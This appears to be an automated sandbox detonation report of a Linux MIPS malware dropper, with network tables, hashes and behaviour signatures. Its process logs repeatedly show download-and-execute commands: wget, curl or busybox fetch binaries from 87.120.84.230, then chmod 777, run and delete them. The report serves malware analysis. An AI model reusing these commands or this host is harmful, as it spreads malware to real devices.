[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 03:22
Reported
2024-10-28 03:25
Platform
debian9-mipsel-20240611-en
Max time kernel
72s
Max time network
70s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
Processes
/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh
[/tmp/d0aa4d8333f14e2cdeb6fd6a944d6ae7e035a12f91eda5f2f2e9c7a47e176165.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
